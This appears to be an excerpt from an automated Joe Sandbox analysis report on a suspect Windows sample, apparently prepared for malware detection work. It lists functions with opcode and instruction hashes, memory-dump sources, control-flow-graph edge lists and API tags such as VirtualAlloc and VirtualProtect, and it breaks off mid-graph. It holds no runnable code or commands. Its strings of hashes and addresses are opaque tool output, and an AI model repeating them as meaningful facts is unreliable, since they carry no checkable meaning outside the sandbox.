                                                                                                                                      • Instruction ID: 957804dee4bf3e7f8fe51c468918f40635e5df310176ab71a5894cbb23b3cf71
                                                                                                                                      • Opcode Fuzzy Hash: 4a27930f80629b0f48b23d86148c851c204864b7fa99f2e4b6ad1b596a5f9019
                                                                                                                                      • Instruction Fuzzy Hash: 86222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880DA8 Relevance: .3, Instructions: 286COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf98d424b2a7961e62a6b06f18bbaff97ef30c2978d49a5544e2156922ee6295
                                                                                                                                      • Instruction ID: cee18fc3cc3ffe8c6400c3666b464a1db33aa200e3b1dfd72a9eba486a9e5de4
                                                                                                                                      • Opcode Fuzzy Hash: cf98d424b2a7961e62a6b06f18bbaff97ef30c2978d49a5544e2156922ee6295
                                                                                                                                      • Instruction Fuzzy Hash: 2AA1E370A19A4D8FE798DB6CC8657A97BF1FFAA710F4001BAD05DD72E6CB7818018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B891AE1 Relevance: 1.8, APIs: 1, Instructions: 520memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b891ae1-7ffd9b891b15 280 7ffd9b891b17 278->280 281 7ffd9b891b1c-7ffd9b891b6b 278->281 280->281 284 7ffd9b891b6d 281->284 285 7ffd9b891b72-7ffd9b891bbb 281->285 284->285 288 7ffd9b891bbd 285->288 289 7ffd9b891bc2-7ffd9b891c15 285->289 288->289 292 7ffd9b891c17 289->292 293 7ffd9b891c1c-7ffd9b891c69 289->293 292->293 296 7ffd9b891c6b 293->296 297 7ffd9b891c70-7ffd9b891cc0 293->297 296->297 300 7ffd9b891cc7-7ffd9b891d38 297->300 301 7ffd9b891cc2 297->301 304 7ffd9b891d3a 300->304 305 7ffd9b891d3f-7ffd9b891d48 300->305 301->300 304->305 306 7ffd9b891dda-7ffd9b891f53 VirtualAlloc 305->306 307 7ffd9b891d4e-7ffd9b891dae call 7ffd9b88fe40 305->307 317 7ffd9b891f55 306->317 318 7ffd9b891f5b-7ffd9b891fbf 306->318 323 7ffd9b891db6-7ffd9b891dd3 307->323 317->318 323->306
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: f14942afa5df6d615368d6cd00dbcc9f3a42a680ff8c544675e9a0f3e7c5354c
                                                                                                                                      • Instruction ID: 556c3dd6e9f5f7e37848db4c1729fb5357ba799d402fcfecfa15124ed11d396f
                                                                                                                                      • Opcode Fuzzy Hash: f14942afa5df6d615368d6cd00dbcc9f3a42a680ff8c544675e9a0f3e7c5354c
                                                                                                                                      • Instruction Fuzzy Hash: F3029F3090DA8D8FDF95EF68C855AE97BF1FF59300F0141AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8903FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 390 7ffd9b8903fe-7ffd9b89040b 391 7ffd9b890416-7ffd9b890427 390->391 392 7ffd9b89040d-7ffd9b890415 390->392 393 7ffd9b890429-7ffd9b890431 391->393 394 7ffd9b890432-7ffd9b89054b VirtualProtect 391->394 392->391 393->394 399 7ffd9b89054d 394->399 400 7ffd9b890553-7ffd9b8905a3 394->400 399->400
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894A02 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 403 7ffd9b894a02-7ffd9b894a35 405 7ffd9b894a3f-7ffd9b894a78 403->405 407 7ffd9b894a86-7ffd9b894a8d 405->407 408 7ffd9b894a7a-7ffd9b894a84 405->408 409 7ffd9b894aad-7ffd9b894f8c 407->409 410 7ffd9b894a8f-7ffd9b894c74 407->410 408->407 409->407 417 7ffd9b894f92-7ffd9b894f9c 409->417 410->407 415 7ffd9b894c7a-7ffd9b894c84 410->415 415->407 417->407
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899F13 Relevance: .6, Instructions: 637COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 418 7ffd9b899f13-7ffd9b899f19 419 7ffd9b899f1b 418->419 420 7ffd9b899f1e-7ffd9b89b177 call 7ffd9b89c00a 418->420 419->420 426 7ffd9b89b179-7ffd9b89b187 420->426 427 7ffd9b89b192-7ffd9b89b21b 426->427 431 7ffd9b89b221-7ffd9b89b2aa 427->431 432 7ffd9b89b2b3-7ffd9b89b2d5 427->432 431->432 452 7ffd9b89b2ac 431->452 436 7ffd9b89b426-7ffd9b89b4bc 432->436 437 7ffd9b89b2db-7ffd9b89b326 432->437 455 7ffd9b89b57f-7ffd9b89b5c5 436->455 456 7ffd9b89b4c2-7ffd9b89b4ce 436->456 446 7ffd9b89b40d-7ffd9b89b41a 437->446 447 7ffd9b89b32b-7ffd9b89b339 446->447 448 7ffd9b89b420-7ffd9b89b421 446->448 453 7ffd9b89b33b 447->453 454 7ffd9b89b340-7ffd9b89b3a2 447->454 451 7ffd9b89b734-7ffd9b89b793 448->451 472 7ffd9b89ba5b-7ffd9b89ba88 451->472 452->432 453->454 461 7ffd9b89b3a9-7ffd9b89b3fb 454->461 462 7ffd9b89b3a4 454->462 471 7ffd9b89b5cc-7ffd9b89b5d2 455->471 463 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 456->463 464 7ffd9b89b4d0-7ffd9b89b51c 456->464 486 7ffd9b89b405-7ffd9b89b40a 461->486 487 7ffd9b89b3fd-7ffd9b89b402 461->487 462->461 463->471 464->463 475 7ffd9b89b721-7ffd9b89b72e 471->475 483 7ffd9b89b798-7ffd9b89b7d4 472->483 484 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 472->484 475->451 478 7ffd9b89b5d7-7ffd9b89b5e5 475->478 480 7ffd9b89b5e7 478->480 481 7ffd9b89b5ec-7ffd9b89b646 478->481 480->481 497 7ffd9b89b6b6-7ffd9b89b6de 481->497 498 7ffd9b89b648-7ffd9b89b670 481->498 492 7ffd9b89b7d6-7ffd9b89b7ed 483->492 493 7ffd9b89b7f1-7ffd9b89ba58 483->493 502 7ffd9b89babb-7ffd9b89baef 484->502 503 7ffd9b89bab4 484->503 486->446 487->486 492->493 493->472 504 7ffd9b89b6e5-7ffd9b89b70e 497->504 505 7ffd9b89b6e0 497->505 500 7ffd9b89b677-7ffd9b89b6b4 498->500 501 7ffd9b89b672 498->501 514 7ffd9b89b719-7ffd9b89b71e 500->514 501->500 508 7ffd9b89bb0f-7ffd9b89bb35 502->508 509 7ffd9b89baf1-7ffd9b89bafe 502->509 503->502 504->514 505->504 511 7ffd9b89bb05-7ffd9b89bb0d 509->511 512 7ffd9b89bb00 509->512 511->508 512->511 514->475
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17d7f82fcbb78064091032633a7860ca131df807bb98c53f8292256aad79c7a5
                                                                                                                                      • Instruction ID: 0f26ee7f938ff6f686900569bd0342a0027df4f70ddfdd4048cda32136d163fc
                                                                                                                                      • Opcode Fuzzy Hash: 17d7f82fcbb78064091032633a7860ca131df807bb98c53f8292256aad79c7a5
                                                                                                                                      • Instruction Fuzzy Hash: 5342BC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C527D Relevance: .4, Instructions: 367COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFA6 Relevance: .4, Instructions: 365COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 690 7ffd9b89afa6-7ffd9b89afcf 692 7ffd9b89afe2 690->692 693 7ffd9b89afd1 690->693 694 7ffd9b89b031-7ffd9b89b05f 692->694 695 7ffd9b89afe4-7ffd9b89aff7 692->695 693->692 698 7ffd9b89b0b8-7ffd9b89b0be 694->698 695->694 699 7ffd9b89b0c0-7ffd9b89b0cf 698->699 700 7ffd9b89b061-7ffd9b89b09c 698->700 701 7ffd9b89b0ff-7ffd9b89b10b 699->701 703 7ffd9b89b09e 700->703 704 7ffd9b89b0a3-7ffd9b89b0b5 700->704 705 7ffd9b89b116-7ffd9b89b134 701->705 703->704 704->698 707 7ffd9b89b137-7ffd9b89b13d 705->707 708 7ffd9b89ad54-7ffd9b89add4 707->708 709 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 707->709 718 7ffd9b89add6-7ffd9b89ade2 708->718 719 7ffd9b89ae04-7ffd9b89ae13 708->719 720 7ffd9b89b179-7ffd9b89b187 709->720 726 7ffd9b89ae31-7ffd9b89ae39 718->726 727 7ffd9b89ade4-7ffd9b89adf9 718->727 722 7ffd9b89ae15 719->722 723 7ffd9b89ae1a-7ffd9b89ae29 719->723 730 7ffd9b89b192-7ffd9b89b21b 720->730 722->723 724 7ffd9b89ae2b-7ffd9b89ae2c 723->724 725 7ffd9b89ae3e-7ffd9b89ae59 723->725 724->726 728 7ffd9b89ae79-7ffd9b89b0dd 725->728 729 7ffd9b89ae5b-7ffd9b89ae75 725->729 726->705 727->719 735 7ffd9b89b12c-7ffd9b89b134 728->735 736 7ffd9b89b0df-7ffd9b89b0f4 728->736 729->728 740 7ffd9b89b221-7ffd9b89b2aa 730->740 741 7ffd9b89b2b3-7ffd9b89b2d5 730->741 735->707 736->701 740->741 761 7ffd9b89b2ac 740->761 745 7ffd9b89b426-7ffd9b89b4bc 741->745 746 7ffd9b89b2db-7ffd9b89b326 741->746 764 7ffd9b89b57f-7ffd9b89b5c5 745->764 765 7ffd9b89b4c2-7ffd9b89b4ce 745->765 755 7ffd9b89b40d-7ffd9b89b41a 746->755 756 7ffd9b89b32b-7ffd9b89b339 755->756 757 7ffd9b89b420-7ffd9b89b421 755->757 762 7ffd9b89b33b 756->762 763 7ffd9b89b340-7ffd9b89b3a2 756->763 760 7ffd9b89b734-7ffd9b89b793 757->760 781 7ffd9b89ba5b-7ffd9b89ba88 760->781 761->741 762->763 770 7ffd9b89b3a9-7ffd9b89b3fb 763->770 771 7ffd9b89b3a4 763->771 780 7ffd9b89b5cc-7ffd9b89b5d2 764->780 772 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 765->772 773 7ffd9b89b4d0-7ffd9b89b51c 765->773 795 7ffd9b89b405-7ffd9b89b40a 770->795 796 7ffd9b89b3fd-7ffd9b89b402 770->796 771->770 772->780 773->772 784 7ffd9b89b721-7ffd9b89b72e 780->784 792 7ffd9b89b798-7ffd9b89b7d4 781->792 793 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 781->793 784->760 787 7ffd9b89b5d7-7ffd9b89b5e5 784->787 789 7ffd9b89b5e7 787->789 790 7ffd9b89b5ec-7ffd9b89b646 787->790 789->790 806 7ffd9b89b6b6-7ffd9b89b6de 790->806 807 7ffd9b89b648-7ffd9b89b670 790->807 801 7ffd9b89b7d6-7ffd9b89b7ed 792->801 802 7ffd9b89b7f1-7ffd9b89ba58 792->802 811 7ffd9b89babb-7ffd9b89baef 793->811 812 7ffd9b89bab4 793->812 795->755 796->795 801->802 802->781 813 7ffd9b89b6e5-7ffd9b89b70e 806->813 814 7ffd9b89b6e0 806->814 809 7ffd9b89b677-7ffd9b89b6b4 807->809 810 7ffd9b89b672 807->810 823 7ffd9b89b719-7ffd9b89b71e 809->823 810->809 817 7ffd9b89bb0f-7ffd9b89bb35 811->817 818 7ffd9b89baf1-7ffd9b89bafe 811->818 812->811 813->823 814->813 820 7ffd9b89bb05-7ffd9b89bb0d 818->820 821 7ffd9b89bb00 818->821 820->817 821->820 823->784
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 712f4ff231cf1df9e3353ec8876cb348f64bf0921d497ba7a92ba37420fbe0c9
                                                                                                                                      • Instruction ID: 0f03dc5ca7ddf64193a62619943fd647b0fc73206490cd23eeba081a8e90858a
                                                                                                                                      • Opcode Fuzzy Hash: 712f4ff231cf1df9e3353ec8876cb348f64bf0921d497ba7a92ba37420fbe0c9
                                                                                                                                      • Instruction Fuzzy Hash: C3E1DB70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C8619 Relevance: .3, Instructions: 335COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 83cbd31e13ed2f5820b23edfd41443a1bdacbc916e137d17f2bd833682fb3384
                                                                                                                                      • Instruction ID: 9ef747018c34ae2b5d5ff9ad1f37cff200eaab0e588096d04f8df6f7a7fde080
                                                                                                                                      • Opcode Fuzzy Hash: 83cbd31e13ed2f5820b23edfd41443a1bdacbc916e137d17f2bd833682fb3384
                                                                                                                                      • Instruction Fuzzy Hash: B5C15E70E1965DCFDB68EB98C864ABCB7B1FF19301F55017AD009E32A1DB386941CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFFB Relevance: .3, Instructions: 324COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 934 7ffd9b89affb-7ffd9b89affd 935 7ffd9b89b07a-7ffd9b89b07c 934->935 936 7ffd9b89afff-7ffd9b89b011 934->936 938 7ffd9b89b085-7ffd9b89b09c 935->938 937 7ffd9b89b0ff-7ffd9b89b10b 936->937 941 7ffd9b89b116-7ffd9b89b134 937->941 939 7ffd9b89b09e 938->939 940 7ffd9b89b0a3-7ffd9b89b0be 938->940 939->940 943 7ffd9b89b0c0-7ffd9b89b0cf 940->943 944 7ffd9b89b061-7ffd9b89b079 940->944 946 7ffd9b89b137-7ffd9b89b13d 941->946 943->937 944->938 947 7ffd9b89ad54-7ffd9b89add4 946->947 948 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 946->948 957 7ffd9b89add6-7ffd9b89ade2 947->957 958 7ffd9b89ae04-7ffd9b89ae13 947->958 959 7ffd9b89b179-7ffd9b89b187 948->959 965 7ffd9b89ae31-7ffd9b89ae39 957->965 966 7ffd9b89ade4-7ffd9b89adf9 957->966 961 7ffd9b89ae15 958->961 962 7ffd9b89ae1a-7ffd9b89ae29 958->962 969 7ffd9b89b192-7ffd9b89b21b 959->969 961->962 963 7ffd9b89ae2b-7ffd9b89ae2c 962->963 964 7ffd9b89ae3e-7ffd9b89ae59 962->964 963->965 967 7ffd9b89ae79-7ffd9b89b0dd 964->967 968 7ffd9b89ae5b-7ffd9b89ae75 964->968 965->941 966->958 974 7ffd9b89b12c-7ffd9b89b134 967->974 975 7ffd9b89b0df-7ffd9b89b0f4 967->975 968->967 979 7ffd9b89b221-7ffd9b89b2aa 969->979 980 7ffd9b89b2b3-7ffd9b89b2d5 969->980 974->946 975->937 979->980 1000 7ffd9b89b2ac 979->1000 984 7ffd9b89b426-7ffd9b89b4bc 980->984 985 7ffd9b89b2db-7ffd9b89b326 980->985 1003 7ffd9b89b57f-7ffd9b89b5c5 984->1003 1004 7ffd9b89b4c2-7ffd9b89b4ce 984->1004 994 7ffd9b89b40d-7ffd9b89b41a 985->994 995 7ffd9b89b32b-7ffd9b89b339 994->995 996 7ffd9b89b420-7ffd9b89b421 994->996 1001 7ffd9b89b33b 995->1001 1002 7ffd9b89b340-7ffd9b89b3a2 995->1002 999 7ffd9b89b734-7ffd9b89b793 996->999 1020 7ffd9b89ba5b-7ffd9b89ba88 999->1020 1000->980 1001->1002 1009 7ffd9b89b3a9-7ffd9b89b3fb 1002->1009 1010 7ffd9b89b3a4 1002->1010 1019 7ffd9b89b5cc-7ffd9b89b5d2 1003->1019 1011 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1004->1011 1012 7ffd9b89b4d0-7ffd9b89b51c 1004->1012 1034 7ffd9b89b405-7ffd9b89b40a 1009->1034 1035 7ffd9b89b3fd-7ffd9b89b402 1009->1035 1010->1009 1011->1019 1012->1011 1023 7ffd9b89b721-7ffd9b89b72e 1019->1023 1031 7ffd9b89b798-7ffd9b89b7d4 1020->1031 1032 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1020->1032 1023->999 1026 7ffd9b89b5d7-7ffd9b89b5e5 1023->1026 1028 7ffd9b89b5e7 1026->1028 1029 7ffd9b89b5ec-7ffd9b89b646 1026->1029 1028->1029 1045 7ffd9b89b6b6-7ffd9b89b6de 1029->1045 1046 7ffd9b89b648-7ffd9b89b670 1029->1046 1040 7ffd9b89b7d6-7ffd9b89b7ed 1031->1040 1041 7ffd9b89b7f1-7ffd9b89ba58 1031->1041 1050 7ffd9b89babb-7ffd9b89baef 1032->1050 1051 7ffd9b89bab4 1032->1051 1034->994 1035->1034 1040->1041 1041->1020 1052 7ffd9b89b6e5-7ffd9b89b70e 1045->1052 1053 7ffd9b89b6e0 1045->1053 1048 7ffd9b89b677-7ffd9b89b6b4 1046->1048 1049 7ffd9b89b672 1046->1049 1062 7ffd9b89b719-7ffd9b89b71e 1048->1062 1049->1048 1056 7ffd9b89bb0f-7ffd9b89bb35 1050->1056 1057 7ffd9b89baf1-7ffd9b89bafe 1050->1057 1051->1050 1052->1062 1053->1052 1059 7ffd9b89bb05-7ffd9b89bb0d 1057->1059 1060 7ffd9b89bb00 1057->1060 1059->1056 1060->1059 1062->1023
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 86a2634ec3dbf1454e23d8a924c17d41f2794a0a1ef5218cc1695e039424a9ff
                                                                                                                                      • Instruction ID: d124df2b1c37f9c389e9e9aa3cfbe694b8fa505699ca6f31b3bd2ac89ff7657b
                                                                                                                                      • Opcode Fuzzy Hash: 86a2634ec3dbf1454e23d8a924c17d41f2794a0a1ef5218cc1695e039424a9ff
                                                                                                                                      • Instruction Fuzzy Hash: 94D1C970A0991D8FDFA8DF58C894AA9B7B1FF98301F1141A9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89B016 Relevance: .3, Instructions: 321COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1064 7ffd9b89b016-7ffd9b89b05f 1067 7ffd9b89b0b8-7ffd9b89b0be 1064->1067 1068 7ffd9b89b0c0-7ffd9b89b0cf 1067->1068 1069 7ffd9b89b061-7ffd9b89b09c 1067->1069 1070 7ffd9b89b0ff-7ffd9b89b10b 1068->1070 1072 7ffd9b89b09e 1069->1072 1073 7ffd9b89b0a3-7ffd9b89b0b5 1069->1073 1074 7ffd9b89b116-7ffd9b89b134 1070->1074 1072->1073 1073->1067 1076 7ffd9b89b137-7ffd9b89b13d 1074->1076 1077 7ffd9b89ad54-7ffd9b89add4 1076->1077 1078 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 1076->1078 1087 7ffd9b89add6-7ffd9b89ade2 1077->1087 1088 7ffd9b89ae04-7ffd9b89ae13 1077->1088 1089 7ffd9b89b179-7ffd9b89b187 1078->1089 1095 7ffd9b89ae31-7ffd9b89ae39 1087->1095 1096 7ffd9b89ade4-7ffd9b89adf9 1087->1096 1091 7ffd9b89ae15 1088->1091 1092 7ffd9b89ae1a-7ffd9b89ae29 1088->1092 1099 7ffd9b89b192-7ffd9b89b21b 1089->1099 1091->1092 1093 7ffd9b89ae2b-7ffd9b89ae2c 1092->1093 1094 7ffd9b89ae3e-7ffd9b89ae59 1092->1094 1093->1095 1097 7ffd9b89ae79-7ffd9b89b0dd 1094->1097 1098 7ffd9b89ae5b-7ffd9b89ae75 1094->1098 1095->1074 1096->1088 1104 7ffd9b89b12c-7ffd9b89b134 1097->1104 1105 7ffd9b89b0df-7ffd9b89b0f4 1097->1105 1098->1097 1109 7ffd9b89b221-7ffd9b89b2aa 1099->1109 1110 7ffd9b89b2b3-7ffd9b89b2d5 1099->1110 1104->1076 1105->1070 1109->1110 1130 7ffd9b89b2ac 1109->1130 1114 7ffd9b89b426-7ffd9b89b4bc 1110->1114 1115 7ffd9b89b2db-7ffd9b89b326 1110->1115 1133 7ffd9b89b57f-7ffd9b89b5c5 1114->1133 1134 7ffd9b89b4c2-7ffd9b89b4ce 1114->1134 1124 7ffd9b89b40d-7ffd9b89b41a 1115->1124 1125 7ffd9b89b32b-7ffd9b89b339 1124->1125 1126 7ffd9b89b420-7ffd9b89b421 1124->1126 1131 7ffd9b89b33b 1125->1131 1132 7ffd9b89b340-7ffd9b89b3a2 1125->1132 1129 7ffd9b89b734-7ffd9b89b793 1126->1129 1150 7ffd9b89ba5b-7ffd9b89ba88 1129->1150 1130->1110 1131->1132 1139 7ffd9b89b3a9-7ffd9b89b3fb 1132->1139 1140 7ffd9b89b3a4 1132->1140 1149 7ffd9b89b5cc-7ffd9b89b5d2 1133->1149 1141 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1134->1141 1142 7ffd9b89b4d0-7ffd9b89b51c 1134->1142 1164 7ffd9b89b405-7ffd9b89b40a 1139->1164 1165 7ffd9b89b3fd-7ffd9b89b402 1139->1165 1140->1139 1141->1149 1142->1141 1153 7ffd9b89b721-7ffd9b89b72e 1149->1153 1161 7ffd9b89b798-7ffd9b89b7d4 1150->1161 1162 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1150->1162 1153->1129 1156 7ffd9b89b5d7-7ffd9b89b5e5 1153->1156 1158 7ffd9b89b5e7 1156->1158 1159 7ffd9b89b5ec-7ffd9b89b646 1156->1159 1158->1159 1175 7ffd9b89b6b6-7ffd9b89b6de 1159->1175 1176 7ffd9b89b648-7ffd9b89b670 1159->1176 1170 7ffd9b89b7d6-7ffd9b89b7ed 1161->1170 1171 7ffd9b89b7f1-7ffd9b89ba58 1161->1171 1180 7ffd9b89babb-7ffd9b89baef 1162->1180 1181 7ffd9b89bab4 1162->1181 1164->1124 1165->1164 1170->1171 1171->1150 1182 7ffd9b89b6e5-7ffd9b89b70e 1175->1182 1183 7ffd9b89b6e0 1175->1183 1178 7ffd9b89b677-7ffd9b89b6b4 1176->1178 1179 7ffd9b89b672 1176->1179 1192 7ffd9b89b719-7ffd9b89b71e 1178->1192 1179->1178 1186 7ffd9b89bb0f-7ffd9b89bb35 1180->1186 1187 7ffd9b89baf1-7ffd9b89bafe 1180->1187 1181->1180 1182->1192 1183->1182 1189 